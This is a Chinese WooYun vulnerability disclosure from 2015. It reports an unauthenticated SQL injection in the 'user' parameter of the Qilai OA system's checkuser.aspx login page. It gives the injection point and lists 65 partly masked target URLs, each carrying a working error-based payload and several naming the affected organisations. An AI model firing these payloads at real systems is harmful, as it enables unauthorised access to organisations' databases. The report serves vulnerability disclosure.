当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150069

漏洞标题:启莱OA系统无需登录SQL注入一枚(附众多案例)

相关厂商:qioa.cn

漏洞作者: 路人甲

提交时间:2015-10-29 12:25

修复时间:2016-02-01 12:30

公开时间:2016-02-01 12:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

无需登录

详细说明:

启莱科技OA系统:
http://www.qioa.cn/product/xsd.html
客户案例:
影响众多政企客户,不过案例列表不太直观:
http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7
注入点:

/client/checkuser.aspx?user=1&pwd=1  user参数存在注入


案例:

mask 区域 
1.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1   中国29金融-MIS系统_
2.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1  四川锦发消防在线办公平台__
3.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1  _中通在线办公平台_
4.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1     重庆高新区育才学校教育OA平台_
5.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1  长沙麦融高科在线办公平台_
6.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1  特铺-战略信息管控平台_
7.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1  云南物流产业集团_
8.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
9.http://**.**.**//client/checkuser.aspxuser=1%27&pwd=1_
10.http://**.**.**//client/checkuser.aspxuser=%27&pwd=1_
11.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
12.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
13.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
14.http://**.**.**/client/checkuser.aspxuser=1%27/**/aND-/**/1=char(@@version)/**/%20--%20&pwd=1_
15.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
16.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
17.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
18.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
19.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
20.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
21.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
22.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
23.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
24.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
25.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
26.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
27.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
28.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
29.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
30.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
31.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
32.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
33.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
34.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
35.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
36.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
37.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
38.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
39.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
40.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
41.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
42.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
43.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
44.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
45.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
46.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
47.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
48.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
49.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
50.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
51.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
52.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
53.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
54.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
55.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
56.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
57.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
58.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
59.http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
60.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
61.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
62.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
63.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
64.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_
65.http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1

漏洞证明:

案例测试:

1.jpg


SQLMAP测试:

2.jpg


3.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-01 12:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无